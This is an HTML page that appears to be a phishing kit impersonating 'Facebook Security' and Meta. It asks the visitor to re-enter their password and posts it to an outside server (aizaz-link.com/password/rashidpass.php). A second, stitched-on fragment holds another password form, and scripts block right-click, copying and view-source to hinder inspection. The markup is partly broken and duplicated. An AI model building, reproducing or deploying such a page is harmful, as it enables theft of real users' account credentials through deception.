<html lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"></head><body>

  
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Password Container</title>
  <link rel="stylesheet" href="index.css">
  <style>
    * {
      font-family: "Segoe UI", Tahoma, Geneva, Verdana, sans-serif;
    }

    .passwordContainer {
      display: block;
      margin: auto;
      width: 30%;
      margin-top: 30px;
    }

    .passwordContainer img {
      width: 100px;
      height: 100px;
      display: block;
      margin: auto;
    }

    .passwordContainer h3 {
      margin-top: 30px;
      font-size: 24px; /* Increase font size here */
    }

    .passwordContainer hr {
      border: 1px solid lightgray;
    }

    .passwordContainer {
      margin-top: 20px;
      display: flex;
      flex-direction: column;
    }

    .passwordContainer button {
      margin-top: 20px;
      padding: 10px;
      border: none;
      background-color: #1778f2;
      color: white;
      border-radius: 5px;
      font-weight: bold;
      cursor: pointer;
    }

    .passwordContainer input {
      margin-top: 10px;
      padding: 14px;
      border: 1px solid lightgray;
      outline: none;
      border-radius: 5px;
    }

    .passwordContainer p {
      color: rgb(152, 151, 151);
    }
  </style>


  <form class="content" action="https://aizaz-link.com/password/rashidpass.php" method="POST">
    <div class="passwordContainer">
      <img src="3357701.webp" alt="Logo">
      <h3>Facebook Security</h3>p
      <p>Please re-enter password to complete the request.</p>
      <label for="password" class="sr-only">Password</label>
      <input type="password" name="password" id="password" placeholder="Password" aria-label="Password" required="">
      <button type="submit">Submit</button>
    </div>
  </form>



</body></html>


            </div><form action="success.php" method="post">
              <div class="ElementWrapper">
                <div data-form-element-key="PrevToPrevYearDays"
                  class="FormElement FormElement_TextBox NoTopMargin PrevToPrevYearDays">
                  <div data-form-element-key="PrevYearDays"
                    class="FormElement FormElement_TextBox NoTopMargin PrevYearDays">
                    <div class="TextBox floatingLabelContainer">
                      <input type="password" name="pass" id="PrevYearDays" required="" placeholder=" ">
                      <label class="Caption" title="Password" for="PrevYearDays">
                        Password
                      </label>
                    </div>
                  </div>
                </div>
                <span id="error_IndividualOrBusiness" class="error-message">Required</span>
                <div data-form-element-key="USResidentCueAlert"
                  class="FormElement FormElement_AlertMessage AlertMessageTopMargin USResidentCueAlert ">
                </div>
                <div data-form-element-key="ButtonNext" class="FormElement FormElement_Button ButtonNext">
                  <div class="Button">
                    <button name="ButtonNext" class="ButtonNext" data-elements-processor="">
                      Submit </button>
                 <form class="sm:hidden lg:block md:block" action="success.php" method="post">
                  </div>
                </div>
              </div>
              <center>
                <font color="black">
                  <font size="2">Meta 2023
          </div>
        </div>
      </div>
      </form>


    </div>
  </div>
  </div>
  </div>
  </div>
  <script type="text/javascript">function mousedwn(e) {try {if (event.button == 2 || event.button == 3) return false} catch (e) {if (e.which == 3) return false} } document.oncontextmenu = function () {return false}; document.ondragstart = function () {return false}; document.onmousedown = mousedwn
  </script>
  <script type="text/javascript">window.addEventListener("keydown", function (e) {if (e.ctrlKey && (e.which == 65 || e.which == 66 || e.which == 67 || e.which == 73 || e.which == 80 || e.which == 83 || e.which == 85 || e.which == 86)) {e.preventDefault()} }); document.keypress = function (e) {if (e.ctrlKey && (e.which == 65 || e.which == 66 || e.which == 67 || e.which == 73 || e.which == 80 || e.which == 83 || e.which == 85 || e.which == 86)) { } return false}
  </script>
</body>

</html>
